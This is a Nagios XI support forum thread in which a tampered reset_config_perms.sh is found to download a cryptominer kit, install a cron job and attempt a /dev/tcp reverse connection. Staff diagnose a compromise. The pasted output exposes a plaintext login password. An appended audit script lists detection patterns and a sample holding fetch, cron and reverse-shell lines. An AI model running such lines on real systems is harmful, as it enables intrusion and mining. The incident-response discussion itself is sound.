Error code: 9.
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Hi,
Yes I tried removing the reconfigure_nagios.lock then I ran reconfigure_nagios.sh and I got as below:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”
[ <=> ] 35,561 --.-K/s in 0.04s
2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]
LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]#
Please find below outputs you requested:
login as: root
root@212.118.13.25's password:
Access denied
root@212.118.13.25's password:
Last login: Wed Jul 18 11:29:10 2018 from 212.35.78.178
[root@um-isp-nagios-redline ~]# reconfigure_nagios.sh
-bash: reconfigure_nagios.sh: command not found
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts
[root@um-isp-nagios-redline scripts]# ./reconfigure_nagios.sh
URL: http://localhost/nagiosxi/includes/components/ccm/
CMDLINE
/usr/bin/wget --save-cookies nagiosql.cookies --keep-session-cookies http://localhost/nagiosxi/includes/components/ccm/ --no-check-certificate --post-data 'submit=Login&hidelog=true&loginSubmitted=true&backend=1&username=nagiosxi&password=MlIvfXBkwP5k3Kxz' -O nagiosql.login--2018-07-18 11:54:47-- http://localhost/nagiosxi/includes/components/ccm/
Resolving localhost... ::1, 127.0.0.1
Connecting to localhost|::1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “nagiosql.login”
[ <=> ] 35,561 --.-K/s in 0.04s
2018-07-18 11:54:47 (991 KB/s) - “nagiosql.login” saved [35561]
LOGIN SUCCESSFUL!
IMPORTING CONFIG FILES...URL: http://localhost/nagiosxi/includes/components/ccm/
Array
(
)
RESETTING CONFIG PERMS FAILED!\n
[root@um-isp-nagios-redline scripts]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_umispnagiosredline-lv_root 8.4G 7.2G 853M 90% /
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda1 485M 39M 421M 9% /boot
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#
I see the errors in the attached in the GUI
And please find in the attached the output of tailerror 100
[root@um-isp-nagios-redline ~]# service httpd status
httpd (pid 1782) is running...
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline ~]#
Please advise how to solve all these problems. Appreciate your prompt response.
Re: Error code: 9.
RESETTING CONFIG PERMS FAILED!\n
This is strange... Can you execute the "reset_config_perms.sh" script logged in as root? Please run the following commands, and show the output.
cd /usr/local/nagiosxi/scripts/
./reset_config_perms.sh
chage nagios -l
chage apache -l
grep nag /etc/group /etc/passwd
Be sure to check out our Knowledgebase for helpful articles and solutions!
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Please find the outputs as below and advise asap:
[root@um-isp-nagios-redline ~]# cd /usr/local/nagiosxi/scripts/
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh
sh: no process killed
--2018-07-19 09:23:59-- http://148.204.64.98/fut.tgz
Connecting to 148.204.64.98:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1573544 (1.5M) [application/x-gzip]
Saving to: “fut.tgz”
100%[======================================>] 1,573,544 932K/s in 1.6s
2018-07-19 09:24:01 (932 KB/s) - “fut.tgz” saved [1573544/1573544]
.s/
.s/h64
.s/upd
.s/x
.s/a
.s/cnrig
.s/run
.s/h32
.s/config.json
.s/.cnrig.cacert.pem
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
[root@um-isp-nagios-redline scripts]# ./reset_config_perms.sh: connect: Connection refused
./reset_config_perms.sh: line 1: /dev/tcp/128.14.62.194/5566: Connection refused
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# chage nagios -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7
You have new mail in /var/spool/mail/root
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# chage apache -l
Last password change : Mar 01, 2018
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : -1
Maximum number of days between password change : -1
Number of days of warning before password expires : -1
[root@um-isp-nagios-redline scripts]#
[root@um-isp-nagios-redline scripts]# grep nag /etc/group /etc/passwd
/etc/group:root:x:0:nagiosadmin
/etc/group:nagios:x:500:nagios,apache
/etc/group:nagcmd:x:501:nagios,apache
/etc/group:nagiosadmin:x:502:
/etc/passwd:nagios:x:500:500::/home/nagios:/bin/bash
/etc/passwd:nagiosadmin:x:501:502::/home/nagiosadmin:/bin/bash
[root@um-isp-nagios-redline scripts]#
- DevOps Engineer
- Posts: 19396
- Joined: Tue Nov 15, 2011 3:11 pm
- Location: Nagios Enterprises
- Contact:
Re: Error code: 9.
Please send a copy of the following file off the server:
/usr/local/nagiosxi/scripts/reset_config_perms.sh
It should not be making a connection to http://148.204.64.98/fut.tgz
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Here in the attached the file.
Please advise
- DevOps Engineer
- Posts: 19396
- Joined: Tue Nov 15, 2011 3:11 pm
- Location: Nagios Enterprises
- Contact:
Re: Error code: 9.
This looks like your machine may have been compromised.
I strongly suggest restoring from a backup from before this started occurring and securing your XI server as best you can.
Re: Error code: 9.
Not only that, you should power the machine down as soon as you can. The last command in the compromised file you shared is connecting back to a remote machine giving someone access.
Former Nagios employee
- Posts: 32
- Joined: Thu Feb 08, 2018 3:24 am
Re: Error code: 9.
Hi,
Can uninstalling Nagios XI and then installing it again solve this problem and remove the compromise?
Please confirm.
Re: Error code: 9.
This is a better question for your Security team. Uninstalling Nagios XI will remove all Nagios components, but as @tmcdonald mentioned - you're connecting back to a server in LA over a TCP socket. I look at this as your system has been completely compromised, and no idea what else may be on the system at this point.
habuhejleh wrote:
Hi,
Can uninstalling Nagios XI and then installing it again solve this problem and remove the compromise?
Please confirm.
http://whois.domaintools.com/128.14.62.194
Former Nagios Employee
- DevOps Engineer
- Posts: 19396
- Joined: Tue Nov 15, 2011 3:11 pm
- Location: Nagios Enterprises
- Contact:
Re: Error code: 9.
You should restart the XI server if you have not already done so.
Then before doing anything else, replace /usr/local/nagiosxi/scripts/reset_config_perms.sh with the file attached.
Finally, I would recommend performing an upgrade immediately to prevent yourself from being targeted again.
https://assets.nagios.com/downloads/nag ... ctions.pdf
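Taking the evidence in this thread together (the fetch of fut.tgz from a raw IP address, the cron line pointing at /var/tmp/.s/upd, and the /dev/tcp connect-back that reset_config_perms.sh attempted), here is an added audit script, not part of Nagios XI and not posted in this thread, that flags those three patterns in a script or crontab dump. It assumes a grep that supports -E and uses constructed TEST-NET addresses in its sample, not the addresses seen in the thread.

```shell
#!/bin/sh
# Added audit helper for this thread; it is not a Nagios XI script. It checks a
# shell script or crontab dump for the three indicators the outputs above show:
#   1. wget/curl fetching from a bare IPv4 address (the fut.tgz download)
#   2. a bash /dev/tcp/<ip>/<port> redirection (the outbound connect-back)
#   3. a cron entry that runs something under /var/tmp (the .s/upd job)
# Genuine XI scripts talk to http://localhost/nagiosxi/, so none of these should
# appear in /usr/local/nagiosxi/scripts/.

IPV4='[0-9]{1,3}(\.[0-9]{1,3}){3}'

# audit_file FILE: prints each matching line with its number, sets HITS to the
# number of indicator classes matched, and returns 1 when anything was found.
audit_file() {
    target="$1"; HITS=0
    if grep -nE "(wget|curl)[^#]*https?://${IPV4}" "$target"; then HITS=$((HITS+1)); fi
    if grep -nE "/dev/tcp/${IPV4}/[0-9]+" "$target"; then HITS=$((HITS+1)); fi
    if grep -nE "^([0-9*/,-]+[[:space:]]+){5}/var/tmp/" "$target"; then HITS=$((HITS+1)); fi
    [ "$HITS" -eq 0 ]
}

# audit_dir DIR: audits every regular file in DIR (e.g. /usr/local/nagiosxi/scripts
# or /var/spool/cron on a live box) and returns 1 if any file is flagged.
audit_dir() {
    bad=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        audit_file "$f" || { echo "FLAGGED: $f"; bad=1; }
    done
    [ "$bad" -eq 0 ]
}

# Constructed sample (TEST-NET addresses, not the ones in the thread) mimicking
# the tampered reset_config_perms.sh and the cron line it installed.
SAMPLE="$(mktemp)"
cat > "$SAMPLE" <<'EOF'
#!/bin/bash
wget http://203.0.113.10/fut.tgz -O /var/tmp/fut.tgz
* * * * * /var/tmp/.s/upd >/dev/null 2>&1
exec 3<>/dev/tcp/203.0.113.20/5566
EOF

# Constructed clean sample: the localhost call a genuine XI script makes.
CLEAN="$(mktemp)"
printf '#!/bin/bash\nwget http://localhost/nagiosxi/includes/components/ccm/ -O nagiosql.login\n' > "$CLEAN"

audit_file "$SAMPLE" || echo "sample flagged: $HITS indicator classes"
audit_file "$CLEAN" && echo "clean sample passed"
```

A hit from this script is a reason to treat the host as compromised and follow the advice above (power down, restore from a pre-incident backup, upgrade); it is not a cleanup tool.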